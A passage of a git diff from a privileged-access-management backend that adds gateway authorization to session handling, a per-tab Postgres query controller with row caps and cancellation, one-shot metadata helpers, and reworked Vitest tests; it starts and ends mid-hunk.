actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); + ForbiddenError.from(permission).throwUnlessCan( OrgPermissionGatewayActions.CreateGateways, OrgPermissionSubjects.Gateway @@ -216,12 +233,19 @@ export const pamSessionServiceFactory = ({ if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { throw new ForbiddenRequestError({ message: "Identity does not have access to end this session" }); } + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + if (session.gatewayId && session.gatewayId !== actor.id) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to end this session" }); + } } else if (actor.type === ActorType.USER) { if (session.userId !== actor.id) { throw new ForbiddenRequestError({ message: "You are not authorized to end this session" }); } } else { - throw new ForbiddenRequestError({ message: "Only identities and users can perform this action" }); + throw new ForbiddenRequestError({ message: "Only gateways and users can perform this action" }); } const updatedSession = await pamSessionDAL.endSessionById(sessionId); @@ -229,28 +253,25 @@ export const pamSessionServiceFactory = ({ if (session.status !== PamSessionStatus.Ended && session.status !== PamSessionStatus.Terminated) { throw new BadRequestError({ message: "Cannot end sessions that are not active or starting" }); } - return { session, projectId: project.id, alreadyEnded: true }; + return { session, projectId: session.projectId, alreadyEnded: true }; } // Fire-and-forget AI summarization void (async () => { try { - await pamSessionAiSummaryService.queueAiSummary(sessionId, project.id); + await pamSessionAiSummaryService.queueAiSummary(sessionId, session.projectId); } catch (err) { logger.error({ sessionId, err }, `Failed to queue AI summary for ended session [sessionId=${sessionId}]`); 
} })(); - return { session: updatedSession, projectId: project.id, alreadyEnded: false }; + return { session: updatedSession, projectId: session.projectId, alreadyEnded: false }; }; const terminateSessionById = async (sessionId: string, actor: OrgServiceActor) => { const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, @@ -265,16 +286,18 @@ export const pamSessionServiceFactory = ({ ProjectPermissionSub.PamSessions ); + // No project lookup needed: getProjectPermission above throws NotFoundError if the + // project doesn't exist, and session.projectId === project.id by definition. // Atomic update: only transitions active/starting β†’ terminated const updatedSession = await pamSessionDAL.terminateSessionById(sessionId); if (!updatedSession) { - return { session, projectId: project.id, alreadyEnded: true }; + return { session, projectId: session.projectId, alreadyEnded: true }; } // Fire-and-forget AI summarization void (async () => { try { - await pamSessionAiSummaryService.queueAiSummary(sessionId, project.id); + await pamSessionAiSummaryService.queueAiSummary(sessionId, session.projectId); } catch (err) { logger.error({ sessionId, err }, `Failed to queue AI summary for terminated session [sessionId=${sessionId}]`); } @@ -326,7 +349,7 @@ export const pamSessionServiceFactory = ({ })(); } - return { session: updatedSession, projectId: project.id, alreadyEnded: false }; + return { session: updatedSession, projectId: session.projectId, alreadyEnded: false }; }; const getSessionLogs = async (sessionId: string, offset: number, limit: number, actor: OrgServiceActor) => { @@ -375,32 
+398,45 @@ export const pamSessionServiceFactory = ({ }; const uploadEventBatch = async ({ sessionId, startOffset, events }: TUploadEventBatchDTO, actor: OrgServiceActor) => { - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } - if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { - throw new 
ForbiddenRequestError({ message: "Identity does not have access to upload events for this session" }); + const authorized = + actor.type === ActorType.GATEWAY + ? !session.gatewayId || session.gatewayId === actor.id + : !session.gatewayIdentityId || session.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to upload events for this session" }); } const { encryptor } = await kmsService.createCipherPairWithDataKey({ @@ -412,7 +448,7 @@ export const pamSessionServiceFactory = ({ const { wasInserted } = await pamSessionEventBatchDAL.upsertBatch(sessionId, startOffset, cipherTextBlob); - return { projectId: project.id, wasInserted }; + return { projectId: session.projectId, wasInserted }; }; return { getById, list, getSessionLogs, updateLogsById, endSessionById, terminateSessionById, uploadEventBatch }; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts b/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts new file mode 100644 index 00000000000..88f3ce9c343 --- /dev/null +++ b/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts @@ -0,0 +1,309 @@ +import { parse as parseSql } from "libpg-query"; +import pg from "pg"; +import Cursor from "pg-cursor"; + +import { logger } from "@app/lib/logger"; + +import { getTableDetailQuery } from "./pam-postgres-data-explorer-metadata"; +import { + PostgresClientMessageType, + PostgresServerMessageType, + type TPostgresClientMessage, + type TPostgresCorrelatedServerMessage +} from "./pam-postgres-ws-types"; + +type ControllerParams = { + relayPort: number; + username: string; + database: string; + sessionId: string; + connectionId: string; + sendResponse: (msg: TPostgresCorrelatedServerMessage) => void; + onUnexpectedTermination: (reason: string) => void; +}; + +// Tab-scoped messages the controller handles. 
Metadata (get-schemas, get-tables) +// and lifecycle messages are handled at the multiplexer layer. +type TTabScopedMessage = Extract< + TPostgresClientMessage, + { + type: PostgresClientMessageType.GetTableDetail | PostgresClientMessageType.Query | PostgresClientMessageType.Cancel; + } +>; + +export type TPostgresConnectionController = { + connectionId: string; + backendPid: number | null; + handleMessage: (msg: TTabScopedMessage) => void; + dispose: () => void; + isDisposing: () => boolean; +}; + +// Type parser shared between the pg.Client and pg-cursor instances so all +// results β€” whether fetched via the simple query path or cursor β€” apply the +// same normalisation rules. +const pgTypes = { + getTypeParser: (oid: number) => { + // Boolean (OID 16): Postgres wire protocol sends 't'/'f' β€” expand to 'true'/'false' + // so the Data Explorer UI displays human-readable literals. + if (oid === 16) + return (val: string | Buffer) => { + const raw = typeof val === "string" ? val : val.toString("utf8"); + return raw === "t" ? "true" : "false"; + }; + return (val: string | Buffer) => (typeof val === "string" ? val : val.toString("hex")); + } +}; + +export const createPostgresConnectionController = async ( + params: ControllerParams +): Promise => { + const { relayPort, username, database, sessionId, connectionId, sendResponse, onUnexpectedTermination } = params; + + const pgClient = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 30_000, + statement_timeout: 30_000, + types: pgTypes + }); + + await pgClient.connect(); + + const { rows: pidRows } = await pgClient.query<{ pid: number }>("SELECT pg_backend_pid() AS pid"); + const backendPid = pidRows[0]?.pid ?? null; + + // Server-side transaction state β€” updated after every query so the client + // always receives the authoritative value, including for multi-statement SQL. 
+ let isInTransaction = false; + let disposing = false; + + const sendQueryError = async (id: string, err: unknown) => { + const pgErr = err as { message?: string; detail?: string; hint?: string }; + + // If the failed query was inside a transaction, roll back so the + // connection is not stuck in an aborted transaction state. + try { + await pgClient.query("ROLLBACK"); + } catch { + // ROLLBACK fails if there was no active transaction β€” safe to ignore. + } + + isInTransaction = false; + + sendResponse({ + type: PostgresServerMessageType.Error, + id, + connectionId, + transactionOpen: false, + error: pgErr.message ?? "Query execution failed", + detail: pgErr.detail, + hint: pgErr.hint + }); + }; + + // Cancel the currently running query via pg_cancel_backend. + // Runs on a separate connection so it is not blocked by the sequential queue. + const cancelRunningQuery = async () => { + if (!backendPid) return; + const cancelClient = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 5_000 + }); + // pg.Client is an EventEmitter; an unhandled 'error' would throw and + // crash the Node process. Attach a no-op listener. + cancelClient.on("error", (err) => { + logger.debug(err, `Cancel client error [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + try { + await cancelClient.connect(); + await cancelClient.query("SELECT pg_cancel_backend($1)", [backendPid]); + } catch (err) { + logger.debug(err, `Failed to cancel backend query [sessionId=${sessionId}] [connectionId=${connectionId}]`); + } finally { + await cancelClient.end().catch(() => {}); + } + }; + + // Sequential message processing to prevent concurrent query issues on the + // same pg.Client. Each controller has its own queue. 
+ let processingPromise: Promise = Promise.resolve(); + + const handleMessage = (message: TTabScopedMessage) => { + // Cancel is handled immediately outside the sequential queue so it can + // interrupt a running query rather than waiting behind it. + if (message.type === PostgresClientMessageType.Cancel) { + if (disposing) return; + void cancelRunningQuery(); + return; + } + + processingPromise = processingPromise + .then(async () => { + if (disposing) return; + + switch (message.type) { + case PostgresClientMessageType.GetTableDetail: { + try { + const query = getTableDetailQuery(message.schema, message.table); + const result = await pgClient.query<{ result: string }>(query.text, query.values); + const rawDetail = result.rows[0]?.result; + if (!rawDetail) { + sendResponse({ + type: PostgresServerMessageType.Error, + id: message.id, + connectionId, + transactionOpen: isInTransaction, + error: "Table not found or no metadata available" + }); + break; + } + const detail = + typeof rawDetail === "string" + ? (JSON.parse(rawDetail) as Record) + : (rawDetail as unknown as Record); + sendResponse({ + type: PostgresServerMessageType.TableDetail, + id: message.id, + connectionId, + transactionOpen: isInTransaction, + data: detail as { + columns: { + name: string; + type: string; + nullable: boolean; + identityGeneration: string | null; + }[]; + primaryKeys: string[]; + foreignKeys: { + constraintName: string; + columns: string[]; + targetSchema: string; + targetTable: string; + targetColumns: string[]; + }[]; + } + }); + } catch (err) { + await sendQueryError(message.id, err); + } + break; + } + + case PostgresClientMessageType.Query: { + try { + const startTime = performance.now(); + const MAX_ROWS = 1000; + + // Split the SQL into individual statements using the real PostgreSQL C parser + // (via libpg-query WASM). 
Each statement is then run through a pg-cursor with + // an explicit row cap β€” the server sends at most MAX_ROWS+1 rows at the wire + // level regardless of result set size, so memory usage is bounded. + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + const parsed = await parseSql(message.sql); + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + const stmtTexts = (parsed.stmts as Array<{ stmt_location?: number; stmt_len?: number }>).map((s) => { + const location = s.stmt_location ?? 0; + return s.stmt_len !== undefined + ? message.sql.slice(location, location + s.stmt_len) + : message.sql.slice(location).trim(); + }); + + let lastRows: Record[] = []; + let lastFields: { name: string }[] = []; + let lastRowCount: number | null = null; + let lastCommand = ""; + let lastIsTruncated = false; + + for (const stmtSql of stmtTexts) { + const cursor = pgClient.query(new Cursor(stmtSql.trim(), null, { types: pgTypes })); + // eslint-disable-next-line no-await-in-loop + const stmtRows = await cursor.read(MAX_ROWS + 1); + const stmtIsTruncated = stmtRows.length > MAX_ROWS; + if (stmtIsTruncated) stmtRows.splice(MAX_ROWS); + // eslint-disable-next-line no-await-in-loop + await cursor.close(); + + // eslint-disable-next-line no-underscore-dangle + const cursorResult = cursor._result; + const cmd = (cursorResult.command ?? "").toUpperCase(); + if (cmd === "BEGIN" || cmd === "START") isInTransaction = true; + if (cmd === "COMMIT" || cmd === "ROLLBACK") isInTransaction = false; + + lastRows = stmtRows; + lastFields = (cursorResult.fields ?? []).map((f) => ({ name: f.name })); + lastRowCount = cursorResult.rowCount; + lastCommand = cursorResult.command ?? 
""; + lastIsTruncated = stmtIsTruncated; + } + + const executionTimeMs = Math.round(performance.now() - startTime); + sendResponse({ + type: PostgresServerMessageType.QueryResult, + id: message.id, + connectionId, + rows: lastRows, + fields: lastFields, + rowCount: lastRowCount, + isTruncated: lastIsTruncated, + transactionOpen: isInTransaction, + command: lastCommand, + executionTimeMs + }); + } catch (err) { + await sendQueryError(message.id, err); + } + break; + } + + default: + break; + } + }) + .catch((err) => { + logger.error(err, `Error processing Postgres message [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + }; + + // Server-initiated termination β€” pg.Client errors outside clean dispose. + pgClient.on("error", (err) => { + if (disposing) return; + logger.error(err, `Tab connection error [sessionId=${sessionId}] [connectionId=${connectionId}]`); + disposing = true; + onUnexpectedTermination(err.message || "Database connection error"); + }); + + pgClient.on("end", () => { + if (disposing) return; + disposing = true; + onUnexpectedTermination("Database connection ended"); + }); + + const dispose = () => { + if (disposing) return; + disposing = true; + // Fire-and-forget: Postgres auto-rollbacks uncommitted txns on socket close + // and cleans up backend PIDs when it next tries to write. No explicit + // ROLLBACK needed β€” keeps dispose synchronous from the caller's view. 
+ void pgClient.end().catch((err) => { + logger.debug(err, `Error closing pg client [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + }; + + return { + connectionId, + backendPid, + handleMessage, + dispose, + isDisposing: () => disposing + }; +}; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts b/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts new file mode 100644 index 00000000000..90ac171b82b --- /dev/null +++ b/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts @@ -0,0 +1,66 @@ +import pg from "pg"; + +import { logger } from "@app/lib/logger"; + +import { getSchemasQuery, getTablesQuery } from "./pam-postgres-data-explorer-metadata"; + +// Shared connection options for one-shot metadata queries. Each call opens a +// fresh pg.Client, runs one query, then disposes β€” no persistent BE state. +type OneShotOptions = { + relayPort: number; + username: string; + database: string; +}; + +const buildClient = ({ relayPort, username, database }: OneShotOptions): pg.Client => { + const client = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 10_000, + statement_timeout: 30_000 + }); + // pg.Client is an EventEmitter; an unhandled 'error' (e.g. mid-query socket + // reset) would throw and crash the Node process. Attach a no-op listener. 
+ client.on("error", (err) => { + logger.debug(err, "one-shot pg client error"); + }); + return client; +}; + +const withClient = async (opts: OneShotOptions, fn: (client: pg.Client) => Promise): Promise => { + const client = buildClient(opts); + await client.connect(); + try { + return await fn(client); + } finally { + await client.end().catch(() => {}); + } +}; + +export const fetchSchemasOneShot = (opts: OneShotOptions): Promise<{ name: string }[]> => + withClient(opts, async (client) => { + const query = getSchemasQuery(); + const result = await client.query<{ name: string }>(query.text, query.values); + return result.rows; + }); + +export const fetchTablesOneShot = ( + opts: OneShotOptions, + schema: string +): Promise<{ name: string; tableType: string }[]> => + withClient(opts, async (client) => { + const query = getTablesQuery(schema); + const result = await client.query<{ name: string; tableType: string }>(query.text, query.values); + return result.rows; + }); + +// Called once at WS setup to fail fast if credentials or tunnel are broken β€” +// preserves the early "Connection error" UX we used to get from pgClient.connect(). 
+export const verifyReachabilityOneShot = (opts: OneShotOptions): Promise => + withClient(opts, async (client) => { + await client.query("SELECT 1"); + }); diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts index 5a4bf5635eb..8d724124e62 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts @@ -3,13 +3,18 @@ /* eslint-disable @typescript-eslint/no-unsafe-call */ /* eslint-disable @typescript-eslint/no-unsafe-argument */ /* eslint-disable @typescript-eslint/unbound-method */ +/* eslint-disable @typescript-eslint/no-explicit-any */ import { beforeEach, describe, expect, test, vi } from "vitest"; import type WebSocket from "ws"; import { PostgresClientMessageType, PostgresServerMessageType } from "./pam-postgres-ws-types"; -import { TerminalServerMessageType, type TSessionContext, type TWebSocketServerMessage } from "./pam-web-access-types"; +import { + SessionEndReason, + TerminalServerMessageType, + type TSessionContext, + type TWebSocketServerMessage +} from "./pam-web-access-types"; -// Mock logger vi.mock("@app/lib/logger", () => ({ logger: { info: vi.fn(), @@ -19,30 +24,55 @@ vi.mock("@app/lib/logger", () => ({ } })); -// Mock the REPL (terminal sessions create one eagerly) -vi.mock("./pam-web-access-repl", () => ({ - createPamSqlRepl: vi.fn(() => ({ - getPrompt: vi.fn().mockReturnValue("=> "), - clearBuffer: vi.fn(), - processInput: vi.fn().mockResolvedValue({ output: "", prompt: "=> ", shouldClose: false }) - })) -})); +// Per-client script lets individual tests stub behaviour for the Nth pg.Client +// that gets constructed. Useful for simulating mid-life failures, differing +// backend PIDs across tab controllers, etc. 
+type ClientScript = { + connect?: () => Promise; + query?: (text: string, values?: unknown[]) => Promise; + end?: () => Promise; +}; + +const clientScripts: ClientScript[] = []; +const createdClients: MockPgClient[] = []; + +type MockPgClient = { + query: ReturnType; + connect: ReturnType; + end: ReturnType; + on: ReturnType; + emit: (event: string, ...args: unknown[]) => void; + _listeners: Record void>>; +}; -// Mock pg vi.mock("pg", () => { - const mockQuery = vi.fn().mockResolvedValue({ rows: [] }); - const mockConnect = vi.fn().mockResolvedValue(undefined); - const mockEnd = vi.fn().mockResolvedValue(undefined); - const mockOn = vi.fn(); + const makeClient = (): MockPgClient => { + const script = clientScripts.shift() ?? {}; + const defaultQuery = vi.fn(async (text: string) => { + if (text.includes("pg_backend_pid")) return { rows: [{ pid: 1000 + createdClients.length }] }; + return { rows: [] }; + }); + const listeners: Record void>> = {}; + const client: MockPgClient = { + query: vi.fn(script.query ?? defaultQuery), + connect: vi.fn(script.connect ?? (async () => {})), + end: vi.fn(script.end ?? 
(async () => {})), + on: vi.fn((event: string, cb: (...args: unknown[]) => void) => { + listeners[event] = listeners[event] || []; + listeners[event].push(cb); + }), + emit: (event: string, ...args: unknown[]) => { + (listeners[event] || []).forEach((cb) => cb(...args)); + }, + _listeners: listeners + }; + createdClients.push(client); + return client; + }; return { default: { - Client: vi.fn(() => ({ - query: mockQuery, - connect: mockConnect, - end: mockEnd, - on: mockOn - })) + Client: vi.fn(() => makeClient()) } }; }); @@ -53,12 +83,11 @@ import pg from "pg"; // eslint-disable-next-line import/first import { handlePostgresSession } from "./pam-postgres-session-handler"; -type MockPgClient = { - query: ReturnType; - connect: ReturnType; - end: ReturnType; - on: ReturnType; -}; +function resetMockState() { + clientScripts.length = 0; + createdClients.length = 0; + (pg.Client as unknown as { mockClear: () => void }).mockClear(); +} function createMockContext(): TSessionContext & { sentMessages: TWebSocketServerMessage[] } { const sentMessages: TWebSocketServerMessage[] = []; @@ -88,81 +117,318 @@ const mockParams = { credentials: { username: "testuser" } } as Parameters[1]; -function getPgInstance(): MockPgClient { - const ClientMock = pg.Client as unknown as { mock: { results: { value: MockPgClient }[] } }; - return ClientMock.mock.results[ClientMock.mock.results.length - 1].value; +function getMessageHandler(ctx: TSessionContext): (data: Buffer) => void { + const messageCall = (ctx.socket.on as ReturnType).mock.calls.find( + ([event]: string[]) => event === "message" + ); + return messageCall![1] as (data: Buffer) => void; +} + +function getSentResponses(ctx: TSessionContext): any[] { + const send = ctx.socket.send as unknown as ReturnType; + // eslint-disable-next-line @typescript-eslint/no-unsafe-return + return send.mock.calls.map(([raw]) => JSON.parse(raw as string)); +} + +async function openConnection(ctx: TSessionContext, id = 
"11111111-1111-1111-1111-111111111111"): Promise { + const onMessage = getMessageHandler(ctx); + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.OpenConnection, id }))); + // Let microtasks settle for the async open flow. + await new Promise((resolve) => { + setTimeout(resolve, 10); + }); + const resp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.ConnectionOpened && r.id === id); + if (!resp) throw new Error("open-connection did not ack"); + return resp.connectionId as string; } describe("handlePostgresSession", () => { beforeEach(() => { vi.clearAllMocks(); + resetMockState(); }); - test("connects to database and sends ready message", async () => { + test("sends ready after reachability check succeeds", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + expect(ctx.sendMessage).toHaveBeenCalledWith(expect.objectContaining({ type: TerminalServerMessageType.Ready })); + // Reachability check β€” one short-lived client. 
+ expect(pg.Client).toHaveBeenCalledTimes(1); + }); + + test("tears down the WS when reachability check fails", async () => { + clientScripts.push({ + connect: async () => { + throw new Error("connection refused"); + } + }); const ctx = createMockContext(); const result = await handlePostgresSession(ctx, mockParams); - expect(pg.Client).toHaveBeenCalledWith( - expect.objectContaining({ - host: "localhost", - port: 5432, - user: "testuser", - database: "testdb" - }) + expect(ctx.sendSessionEnd).toHaveBeenCalledWith(SessionEndReason.SetupFailed); + expect(ctx.sendMessage).not.toHaveBeenCalledWith( + expect.objectContaining({ type: TerminalServerMessageType.Ready }) ); - expect(ctx.sendMessage).toHaveBeenCalledWith( - expect.objectContaining({ - type: TerminalServerMessageType.Ready + expect(result.cleanup).toBeDefined(); + }); + + test("open-connection creates a controller and returns connectionId + backendPid", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const connectionId = await openConnection(ctx); + expect(connectionId).toMatch(/[0-9a-f-]{36}/i); + const resp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.ConnectionOpened); + expect(resp.backendPid).toBeTypeOf("number"); + }); + + test("get-schemas uses a short-lived client and works with no tab controllers", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + // Script a schemas query response on the next client created. 
+ clientScripts.push({ + query: vi.fn(async (text: string) => { + if (text.includes("pg_namespace")) return { rows: [{ name: "public" }] }; + return { rows: [] }; + }) + }); + + const onMessage = getMessageHandler(ctx); + const reqId = "22222222-2222-2222-2222-222222222222"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.GetSchemas, id: reqId }))); + + await new Promise((r) => { + setTimeout(r, 20); + }); + + const responses = getSentResponses(ctx); + const schemasResp = responses.find((r) => r.type === PostgresServerMessageType.Schemas && r.id === reqId); + expect(schemasResp).toBeTruthy(); + expect(schemasResp.data).toEqual([{ name: "public" }]); + }); + + test("get-tables works while a tab controller is open", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + await openConnection(ctx); + + clientScripts.push({ + query: vi.fn(async (text: string) => { + if (text.includes("pg_class")) return { rows: [{ name: "users", tableType: "table" }] }; + return { rows: [] }; }) + }); + + const onMessage = getMessageHandler(ctx); + const reqId = "33333333-3333-3333-3333-333333333333"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.GetTables, id: reqId, schema: "public" }))); + + await new Promise((r) => { + setTimeout(r, 20); + }); + const tablesResp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Tables && r.id === reqId); + expect(tablesResp).toBeTruthy(); + expect(tablesResp.data).toEqual([{ name: "users", tableType: "table" }]); + }); + + test("unknown connectionId on tab-scoped message returns 'Connection not found'", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const onMessage = getMessageHandler(ctx); + const reqId = "44444444-4444-4444-4444-444444444444"; + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Query, + id: reqId, + connectionId: 
"99999999-9999-9999-9999-999999999999", + sql: "SELECT 1" + }) + ) ); - expect(result.cleanup).toBeDefined(); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const err = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Error && r.id === reqId); + expect(err).toBeTruthy(); + expect(err.error).toContain("Connection not found"); }); - test("registers message handler on socket", async () => { + test("close-connection on unknown id is a silent no-op", async () => { const ctx = createMockContext(); await handlePostgresSession(ctx, mockParams); - expect(ctx.socket.on).toHaveBeenCalledWith("message", expect.any(Function)); + const onMessage = getMessageHandler(ctx); + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.CloseConnection, + connectionId: "99999999-9999-9999-9999-999999999999" + }) + ) + ); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const responses = getSentResponses(ctx); + // No response ever sent for close-connection. 
+ expect(responses.filter((r) => r.type === PostgresServerMessageType.ConnectionClosed)).toEqual([]); + expect(responses.filter((r) => r.type === PostgresServerMessageType.Error)).toEqual([]); }); - test("cleanup closes pg client", async () => { + test("cancel on unknown connectionId is a silent no-op", async () => { const ctx = createMockContext(); - const result = await handlePostgresSession(ctx, mockParams); - const pgInstance = getPgInstance(); + await handlePostgresSession(ctx, mockParams); - await result.cleanup(); - expect(pgInstance.end).toHaveBeenCalled(); + const onMessage = getMessageHandler(ctx); + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Cancel, + connectionId: "99999999-9999-9999-9999-999999999999" + }) + ) + ); + + await new Promise((r) => { + setTimeout(r, 10); + }); + expect(getSentResponses(ctx)).toEqual([]); }); - test("handles get-schemas data explorer message", async () => { + test("activity keepalive is accepted and emits no response", async () => { const ctx = createMockContext(); await handlePostgresSession(ctx, mockParams); - const pgInstance = getPgInstance(); - pgInstance.query.mockResolvedValue({ - rows: [{ name: "public" }, { name: "auth" }] + const onMessage = getMessageHandler(ctx); + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.Activity }))); + + await new Promise((r) => { + setTimeout(r, 10); }); + expect(getSentResponses(ctx)).toEqual([]); + expect(ctx.sendSessionEnd).not.toHaveBeenCalled(); + }); + + test("server-initiated controller death removes entry and emits connection-closed", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + const connectionId = await openConnection(ctx); - // Get the message handler callback - const messageCall = (ctx.socket.on as ReturnType).mock.calls.find( - ([event]: string[]) => event === "message" + // Grab the tab controller's pg.Client (created after reachability client). 
+ const tabClient = createdClients[1]; + tabClient.emit("error", new Error("peer reset")); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const closedEvt = getSentResponses(ctx).find( + (r) => r.type === PostgresServerMessageType.ConnectionClosed && r.connectionId === connectionId ); - const onMessage = messageCall?.[1] as ((data: Buffer) => void) | undefined; + expect(closedEvt).toBeTruthy(); + expect(closedEvt.reason).toBe("peer reset"); - if (onMessage) { - const msg = Buffer.from( - JSON.stringify({ type: PostgresClientMessageType.GetSchemas, id: "550e8400-e29b-41d4-a716-446655440000" }) - ); - onMessage(msg); + // Subsequent tab-scoped message for the same id should now miss. + const onMessage = getMessageHandler(ctx); + const reqId = "55555555-5555-5555-5555-555555555555"; + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Query, + id: reqId, + connectionId, + sql: "SELECT 1" + }) + ) + ); + await new Promise((r) => { + setTimeout(r, 10); + }); + const err = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Error && r.id === reqId); + expect(err.error).toContain("Connection not found"); + }); - // Wait for async processing - await new Promise((resolve) => { - setTimeout(resolve, 50); - }); + test("exceeding MAX_CONNECTIONS_PER_WS returns connection-open-failed", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + for (let i = 0; i < 20; i += 1) { + // eslint-disable-next-line no-await-in-loop + await openConnection(ctx, `aaaaaaaa-aaaa-aaaa-aaaa-${String(i).padStart(12, "0")}`); + } + + const onMessage = getMessageHandler(ctx); + const overflowId = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.OpenConnection, id: overflowId }))); + await new Promise((r) => { + setTimeout(r, 10); + }); + const failed = getSentResponses(ctx).find( + (r) => r.type === 
PostgresServerMessageType.ConnectionOpenFailed && r.id === overflowId + ); + expect(failed).toBeTruthy(); + expect(failed.error).toContain("Maximum"); + }); - expect((ctx.socket as unknown as { send: ReturnType }).send).toHaveBeenCalledWith( - expect.stringContaining(`"${PostgresServerMessageType.Schemas}"`) + test("concurrent open-connection requests cannot bypass the cap", async () => { + // Simulates a client firing 25 opens at once. Without the pendingOpens + // counter, each check against controllers.size would see 0 before any + // controller finished connecting, and all 25 would succeed. + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const onMessage = getMessageHandler(ctx); + const ATTEMPTS = 25; + for (let i = 0; i < ATTEMPTS; i += 1) { + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.OpenConnection, + id: `eeeeeeee-eeee-eeee-eeee-${String(i).padStart(12, "0")}` + }) + ) ); } + + await new Promise((r) => { + setTimeout(r, 50); + }); + + const opened = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpened); + const failed = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpenFailed); + expect(opened.length).toBe(20); + expect(failed.length).toBe(ATTEMPTS - 20); + }); + + test("cleanup disposes every controller", async () => { + const ctx = createMockContext(); + const result = await handlePostgresSession(ctx, mockParams); + await openConnection(ctx, "cccccccc-cccc-cccc-cccc-cccccccccccc"); + await openConnection(ctx, "dddddddd-dddd-dddd-dddd-dddddddddddd"); + + const tabClients = createdClients.slice(1, 3); + + await result.cleanup(); + + tabClients.forEach((c) => { + expect(c.end).toHaveBeenCalled(); + }); + }); + + test("two tab controllers have independent backendPids", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + await openConnection(ctx, 
